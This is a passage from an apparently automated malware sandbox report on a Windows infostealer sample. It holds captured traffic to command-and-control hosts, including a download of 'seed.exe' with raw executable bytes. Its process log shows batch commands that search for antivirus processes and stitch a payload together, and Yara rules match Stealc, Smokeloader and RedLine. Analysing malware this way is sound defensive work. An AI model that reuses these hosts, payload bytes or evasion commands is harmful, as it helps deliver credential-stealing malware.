                                                                                                                                  Content-Length: 0
                                                                                                                                  Keep-Alive: timeout=5, max=65
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Oct 10, 2024 09:29:16.207715034 CEST469OUTPOST /edd20096ecef326d.php HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary=----JJDGCGHCGHCBFHJJKKJE
                                                                                                                                  Host: 62.204.41.176
                                                                                                                                  Content-Length: 269
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31 65 39 39 38 66 30 37 30 30 33 30 66 35 31 38 34 39 30 61 39 64 33 33 30 34 35 38 37 65 35 38 62 38 35 33 62 36 38 30 65 66 66 36 65 61 65 33 38 64 36 61 66 63 32 64 31 37 37 64 65 63 39 34 34 62 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 74 6b 6a 77 65 66 77 65 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 2d 2d 0d 0a
                                                                                                                                  Data Ascii: ------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="token"811b01e998f070030f518490a9d3304587e58b853b680eff6eae38d6afc2d177dec944b4------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="message"tkjwefwee------JJDGCGHCGHCBFHJJKKJE--
                                                                                                                                  Oct 10, 2024 09:29:16.479151011 CEST263INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 10 Oct 2024 07:29:16 GMT
                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                  Content-Length: 60
                                                                                                                                  Keep-Alive: timeout=5, max=64
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 33 4e 69 34 78 4d 54 4d 75 4d 54 45 31 4c 6a 4d 33 4c 33 4e 6c 5a 57 51 75 5a 58 68 6c 66 44 42 38 4d 48 78 54 64 47 46 79 64 48 77 7a 66 41 3d 3d
                                                                                                                                  Data Ascii: aHR0cDovLzE3Ni4xMTMuMTE1LjM3L3NlZWQuZXhlfDB8MHxTdGFydHwzfA==
                                                                                                                                  Oct 10, 2024 09:29:19.759404898 CEST468OUTPOST /edd20096ecef326d.php HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary=----EHJJKFCBGIDGHIECGCBK
                                                                                                                                  Host: 62.204.41.176
                                                                                                                                  Content-Length: 268
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4a 4b 46 43 42 47 49 44 47 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31 65 39 39 38 66 30 37 30 30 33 30 66 35 31 38 34 39 30 61 39 64 33 33 30 34 35 38 37 65 35 38 62 38 35 33 62 36 38 30 65 66 66 36 65 61 65 33 38 64 36 61 66 63 32 64 31 37 37 64 65 63 39 34 34 62 34 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4a 4b 46 43 42 47 49 44 47 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 72 68 65 74 6a 72 65 65 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4a 4b 46 43 42 47 49 44 47 48 49 45 43 47 43 42 4b 2d 2d 0d 0a
                                                                                                                                  Data Ascii: ------EHJJKFCBGIDGHIECGCBKContent-Disposition: form-data; name="token"811b01e998f070030f518490a9d3304587e58b853b680eff6eae38d6afc2d177dec944b4------EHJJKFCBGIDGHIECGCBKContent-Disposition: form-data; name="message"rhetjree------EHJJKFCBGIDGHIECGCBK--
                                                                                                                                  Oct 10, 2024 09:29:20.042051077 CEST202INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 10 Oct 2024 07:29:19 GMT
                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                  Content-Length: 0
                                                                                                                                  Keep-Alive: timeout=5, max=63
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  2192.168.2.549981176.113.115.37806020C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 10, 2024 09:29:16.591953993 CEST73OUTGET /seed.exe HTTP/1.1
                                                                                                                                  Host: 176.113.115.37
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Oct 10, 2024 09:29:17.297039986 CEST1236INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 10 Oct 2024 07:29:17 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Last-Modified: Thu, 05 Sep 2024 14:37:52 GMT
                                                                                                                                  ETag: "4400-621603c451000"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Content-Length: 17408
                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e9 30 2c f3 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 3a 00 00 00 08 00 00 00 00 00 00 4a 59 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f7 58 00 00 4f 00 00 00 00 60 00 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 0c 00 00 00 30 58 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0,"0:JY `@ `XO`0X8 H.textP9 : `.rsrc`<@@.relocB@B+YH.X)XZ*0>so+(]-o(-o*!.1]-rp*r7p*/]-rkp*rp*rp*&1**09#+l(XX2#4#**0/(}}|(+|(*07(}}}|(+|(*0[& *
                                                                                                                                  Oct 10, 2024 09:29:17.297064066 CEST1236INData Raw: 00 00 00 00 00 00 06 06 00 09 16 00 00 01 1e 02 28 1e 00 00 0a 2a 7e 73 23 00 00 06 80 01 00 00 04 28 0c 00 00 06 28 0d 00 00 06 73 27 00 00 06 80 02 00 00 04 2a 13 30 01 00 14 00 00 00 06 00 00 11 02 28 06 00 00 06 6f 1f 00 00 0a 0a 12 00 28 20
                                                                                                                                  Data Ascii: (*~s#((s'*0(o( *~*~*~*(*rp s!%rpr[po"%rsprpo"*o#1'$s%(+,'s%(+**~(rpo
                                                                                                                                  Oct 10, 2024 09:29:17.297079086 CEST1236INData Raw: 00 00 04 28 4d 00 00 0a 2a 00 13 30 02 00 3f 00 00 00 0f 00 00 11 12 00 28 1b 00 00 0a 7d 23 00 00 04 12 00 03 7d 25 00 00 04 12 00 04 7d 24 00 00 04 12 00 15 7d 22 00 00 04 12 00 7c 23 00 00 04 12 00 28 08 00 00 2b 12 00 7c 23 00 00 04 28 1d 00
                                                                                                                                  Data Ascii: (M*0?(}#}%}$}"|#(+|#(*07(K}}}|(+|(M*{*"}*{*"}*{*"}*{*"}*((,(.
                                                                                                                                  Oct 10, 2024 09:29:17.297090054 CEST672INData Raw: 04 00 dd 00 00 00 14 00 00 11 02 7b 1d 00 00 04 0a 06 2c 59 02 20 00 00 c0 08 8d 41 00 00 01 7d 20 00 00 04 02 7b 1f 00 00 04 02 7b 20 00 00 04 16 02 7b 20 00 00 04 8e 69 6f 62 00 00 0a 6f 63 00 00 0a 0d 12 03 28 64 00 00 0a 2d 3c 02 16 25 0a 7d
                                                                                                                                  Data Ascii: {,Y A} {{ { ioboc(d-<%}}!|(+y{!|!%}(f| (+{ (: }} |(h}} |(i*
                                                                                                                                  Oct 10, 2024 09:29:17.297101021 CEST1236INData Raw: 00 06 6f 53 00 00 0a 13 05 12 05 28 54 00 00 0a 2d 3e 02 17 25 0a 7d 27 00 00 04 02 11 05 7d 2d 00 00 04 02 7c 28 00 00 04 12 05 02 28 10 00 00 2b de 62 02 7b 2d 00 00 04 13 05 02 7c 2d 00 00 04 fe 15 08 00 00 1b 02 15 25 0a 7d 27 00 00 04 12 05
                                                                                                                                  Data Ascii: oS(T->%}'}-|((+b{-|-%}'(V }'}+|((h}'}+|((i* 6|((j*BSJBv4.0.30319l#~ |#Strings
                                                                                                                                  Oct 10, 2024 09:29:17.297112942 CEST1236INData Raw: 1a 04 06 00 a0 04 f5 03 06 00 1d 09 16 04 01 00 a4 00 22 04 01 00 55 00 2b 04 36 00 74 01 2f 04 16 00 01 00 33 04 06 00 e8 03 67 01 06 00 a0 04 f5 03 06 00 1d 09 3c 04 06 00 c6 07 45 04 01 00 d1 00 0e 04 01 00 55 00 4a 04 06 00 a0 04 f5 03 06 00
                                                                                                                                  Data Ascii: "U+6t/3g<EUJ}QEU+<}QEU+VVVKVP UX 1[ h m
                                                                                                                                  Oct 10, 2024 09:29:17.297122955 CEST1236INData Raw: 00 00 01 00 81 06 00 00 01 00 ff 08 00 00 01 00 aa 07 00 00 01 00 f1 0a 00 00 01 00 0f 0d 00 00 01 00 b7 01 00 00 02 00 c0 01 00 00 01 00 f1 0a 00 00 01 00 2a 03 00 00 01 00 de 03 00 00 01 00 96 08 00 00 01 00 33 0a 00 00 01 00 29 07 00 00 01 00
                                                                                                                                  Data Ascii: *3)vC^}}#
                                                                                                                                  Oct 10, 2024 09:29:17.297135115 CEST1236INData Raw: e8 03 43 02 83 00 e8 03 63 02 83 00 e8 03 00 05 7b 00 a6 06 20 05 7b 00 f0 06 40 05 7b 00 2e 07 60 05 83 00 e8 03 80 05 83 00 e8 03 a0 05 83 00 e8 03 c0 05 83 00 e8 03 e0 05 83 00 e8 03 00 06 83 00 e8 03 20 06 83 00 e8 03 40 06 83 00 e8 03 c0 06
                                                                                                                                  Data Ascii: Cc{ {@{.` @ @&Xc^j1C?8Y<@IMR*I*X]
                                                                                                                                  Oct 10, 2024 09:29:17.297148943 CEST1236INData Raw: 6e 67 46 69 65 6c 64 00 3c 44 61 74 65 3e 6b 5f 5f 42 61 63 6b 69 6e 67 46 69 65 6c 64 00 3c 49 70 3e 6b 5f 5f 42 61 63 6b 69 6e 67 46 69 65 6c 64 00 3c 53 65 6e 64 65 72 49 70 3e 6b 5f 5f 42 61 63 6b 69 6e 67 46 69 65 6c 64 00 3c 53 74 61 74 75
                                                                                                                                  Data Ascii: ngField<Date>k__BackingField<Ip>k__BackingField<SenderIp>k__BackingField<Status>k__BackingField<Content>k__BackingField<Port>k__BackingFieldget_Methodset_MethodmethodpasswordDestructMeDivideStatusCodeStorageSendMessageReciveMes
                                                                                                                                  Oct 10, 2024 09:29:17.297163963 CEST1236INData Raw: 64 72 6f 70 44 69 72 65 63 74 6f 72 79 50 61 74 68 00 67 65 74 5f 4c 65 6e 67 74 68 00 53 74 61 72 74 73 57 69 74 68 00 46 48 44 6b 00 57 61 6c 6c 65 74 73 55 70 64 61 74 65 72 2e 43 6f 72 65 2e 4e 65 74 77 6f 72 6b 00 67 65 74 5f 54 61 73 6b 00
                                                                                                                                  Data Ascii: dropDirectoryPathget_LengthStartsWithFHDkWalletsUpdater.Core.Networkget_TaskFactorialvalNetworkStreamGetStreamstreamProgramprogramget_ItemSystemEnumIsNumberGreaterThanTenMainget_LocationSystem.ReflectionKeyCollectionDivide
                                                                                                                                  Oct 10, 2024 09:29:17.302020073 CEST1236INData Raw: 65 6e 74 00 73 65 74 5f 43 6f 6e 74 65 6e 74 00 63 6f 6e 74 65 6e 74 00 49 50 45 6e 64 50 6f 69 6e 74 00 5f 65 6e 64 50 6f 69 6e 74 00 53 74 61 72 74 00 67 65 74 5f 50 6f 72 74 00 70 6f 72 74 00 4c 6f 61 64 41 6e 64 44 72 6f 70 49 66 45 78 69 73
                                                                                                                                  Data Ascii: entset_ContentcontentIPEndPoint_endPointStartget_PortportLoadAndDropIfExistnameWithoutExtMoveNextSystem.TextregViewRegistryViewget_NowPowset_CreateNoWindowxParseFromByteArrayToArrayCreateSubKeyOpenSubKeyOpenBaseKeyprogra


                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  0192.168.2.549978104.21.56.704436412C:\Users\user\AppData\Local\Temp\464151\Blank.pif
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-10-10 07:28:40 UTC90OUTGET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                                                                                                  User-Agent: ShareScreen
                                                                                                                                  Host: post-to-me.com
                                                                                                                                  2024-10-10 07:28:40 UTC632INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 10 Oct 2024 07:28:40 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a2j9SkNuGmV8nCBTL5DHC8pemCXH3M%2BMEQGIsHb51N6vjJAHwo0bieV%2Br0v0isbtt2MdsNonRjaPIn391tg2w9ht9B23NBIwCAJKlRhanu%2FQCyrOu3JMwXNMLThbbjiB%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8d04e51eb8410cc6-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  2024-10-10 07:28:40 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                  Data Ascii: 2ok
                                                                                                                                  2024-10-10 07:28:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Statistics

                                                                                                                                  CPU Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  Memory Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  High Level Behavior Distribution

                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                  Behavior

                                                                                                                                  Click to jump to process

                                                                                                                                  System Behavior

                                                                                                                                  General

                                                                                                                                  Target ID:0
                                                                                                                                  Start time:03:27:15
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Users\user\Desktop\hlyG1m5UmO.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\hlyG1m5UmO.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:1'162'094 bytes
                                                                                                                                  MD5 hash:3EC2504913E8CDF08B76861CD96317D0
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:2
                                                                                                                                  Start time:03:27:16
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c move Accepting Accepting.bat & Accepting.bat
                                                                                                                                  Imagebase:0x790000
                                                                                                                                  File size:236'544 bytes
                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:3
                                                                                                                                  Start time:03:27:17
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                  File size:862'208 bytes
                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:4
                                                                                                                                  Start time:03:27:19
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:tasklist
                                                                                                                                  Imagebase:0x460000
                                                                                                                                  File size:79'360 bytes
                                                                                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:moderate
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:5
                                                                                                                                  Start time:03:27:19
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:findstr /I "wrsa opssvc"
                                                                                                                                  Imagebase:0x220000
                                                                                                                                  File size:29'696 bytes
                                                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:moderate
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:6
                                                                                                                                  Start time:03:27:19
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:tasklist
                                                                                                                                  Imagebase:0x460000
                                                                                                                                  File size:79'360 bytes
                                                                                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:moderate
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:7
                                                                                                                                  Start time:03:27:19
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                                                                                                  Imagebase:0x220000
                                                                                                                                  File size:29'696 bytes
                                                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:moderate
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:8
                                                                                                                                  Start time:03:27:20
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:cmd /c md 464151
                                                                                                                                  Imagebase:0x790000
                                                                                                                                  File size:236'544 bytes
                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:9
                                                                                                                                  Start time:03:27:20
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:findstr /V "DHappenedWestminsterUnexpected" Heat
                                                                                                                                  Imagebase:0x220000
                                                                                                                                  File size:29'696 bytes
                                                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:moderate
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:10
                                                                                                                                  Start time:03:27:21
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:cmd /c copy /b ..\Theaters + ..\Keeping + ..\Estimate + ..\Tribute + ..\Nails + ..\Kingdom + ..\New + ..\Tears + ..\Zoo V
                                                                                                                                  Imagebase:0x790000
                                                                                                                                  File size:236'544 bytes
                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:11
                                                                                                                                  Start time:03:27:21
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\464151\Blank.pif
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:Blank.pif V
                                                                                                                                  Imagebase:0x260000
                                                                                                                                  File size:893'608 bytes
                                                                                                                                  MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 5%, ReversingLabs
                                                                                                                                  Reputation:moderate
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:12
                                                                                                                                  Start time:03:27:21
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:choice /d y /t 5
                                                                                                                                  Imagebase:0x1b0000
                                                                                                                                  File size:28'160 bytes
                                                                                                                                  MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:moderate
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:15
                                                                                                                                  Start time:03:28:33
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\464151\Blank.pif
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\464151\Blank.pif
                                                                                                                                  Imagebase:0x260000
                                                                                                                                  File size:893'608 bytes
                                                                                                                                  MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:false

                                                                                                                                  General

                                                                                                                                  Target ID:16
                                                                                                                                  Start time:03:28:41
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\1248.tmp.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:343'552 bytes
                                                                                                                                  MD5 hash:EBDE83ED138C71C69900E4BD1457B350
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000010.00000002.3346073741.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000010.00000002.3348010697.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000010.00000002.3348010697.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000010.00000002.3347378928.00000000006B3000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000010.00000003.3002753873.0000000002330000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000010.00000002.3347473837.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Has exited:false

                                                                                                                                  General

                                                                                                                                  Target ID:19
                                                                                                                                  Start time:03:28:47
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 804
                                                                                                                                  Imagebase:0x590000
                                                                                                                                  File size:483'680 bytes
                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:21
                                                                                                                                  Start time:03:28:48
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 804
                                                                                                                                  Imagebase:0x590000
                                                                                                                                  File size:483'680 bytes
                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:23
                                                                                                                                  Start time:03:28:49
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 856
                                                                                                                                  Imagebase:0x590000
                                                                                                                                  File size:483'680 bytes
                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:25
                                                                                                                                  Start time:03:28:50
                                                                                                                                  Start date:10/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 864
                                                                                                                                  Imagebase:0x590000
                                                                                                                                  File size:483'680 bytes
                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:27
